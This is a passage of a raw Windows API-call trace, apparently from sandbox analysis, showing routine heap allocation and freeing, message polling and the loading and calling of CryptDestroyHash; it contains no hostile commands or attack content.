[0130.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8ab0 | out: hHeap=0x1780000) returned 1 [0130.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0130.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0130.277] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0130.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0130.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e99c8 [0130.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0130.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0130.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0130.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0130.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0130.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0130.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0130.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0130.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0130.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0130.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0130.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0130.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0130.278] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0130.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0130.278] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0130.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0130.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0130.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0130.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0130.278] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0130.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0130.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0130.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0130.278] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0130.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0130.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0130.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0130.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0130.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0130.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0130.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0130.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb060 [0130.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae38 [0130.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caf10 [0130.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0130.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caf88 [0130.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cada8 [0130.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae98 [0130.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae80 [0130.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0130.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb030 [0130.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0130.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0130.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae50 [0130.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0130.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caeb0 [0130.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caec8 [0130.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0130.483] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caf70 [0130.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cafa0 [0130.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0130.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cafe8 [0130.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb000 [0130.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0130.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0130.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0130.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0130.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392538 [0130.484] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0130.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392538 | out: hHeap=0x1780000) returned 1 [0130.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0130.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb018 [0130.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0130.484] PeekMessageW (in: lpMsg=0x144e65c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e65c) returned 0 [0130.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0130.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0130.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0130.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0130.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0130.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0130.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0130.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0130.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0130.484] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0130.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0130.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0130.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0130.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0130.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0130.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0130.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0130.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0130.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0130.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0130.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0130.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0130.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0130.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0130.485] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0130.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0130.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0130.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0130.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0130.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0130.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0130.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0130.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0130.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0130.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0130.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0130.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0130.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0130.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0130.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0130.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0130.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0130.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0130.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0130.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0130.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0130.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796f08 [0130.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796f08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0130.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0130.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0130.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0130.486] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0130.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0130.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0130.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0130.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0130.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0130.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0130.487] CryptDestroyHash (hHash=0x41ac6c0) returned 1 [0130.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0130.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea040 [0130.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0130.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb270 [0130.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0130.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2d0 [0130.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0130.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2d0 | out: hHeap=0x1780000) returned 1 [0130.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0130.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0130.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0130.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0130.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0130.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0130.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0130.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0130.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0130.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0130.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0130.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0130.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0130.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0130.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0130.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0130.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0130.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0130.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0130.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0130.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0130.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0130.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0130.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0130.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0130.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0130.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0130.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0130.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0130.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0130.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0130.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0130.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0130.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0130.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0130.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0130.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0130.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0130.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0130.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0130.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0130.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0130.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0130.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0130.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0130.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0130.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0130.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0130.489] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0130.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0130.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0130.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0130.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0130.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0130.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0130.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0130.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0130.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0130.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0130.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0130.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0130.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0130.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0130.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0130.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0130.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0130.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0130.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0130.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0130.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0130.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0130.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1e0 | out: hHeap=0x1780000) returned 1 [0130.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0130.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea6b8 | out: hHeap=0x1780000) returned 1 [0130.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0130.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0130.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0130.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0130.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0130.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0130.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0130.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0130.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0130.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0130.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0130.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0130.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0130.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0130.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0130.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0130.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0130.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0130.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0130.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0130.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0130.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0130.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 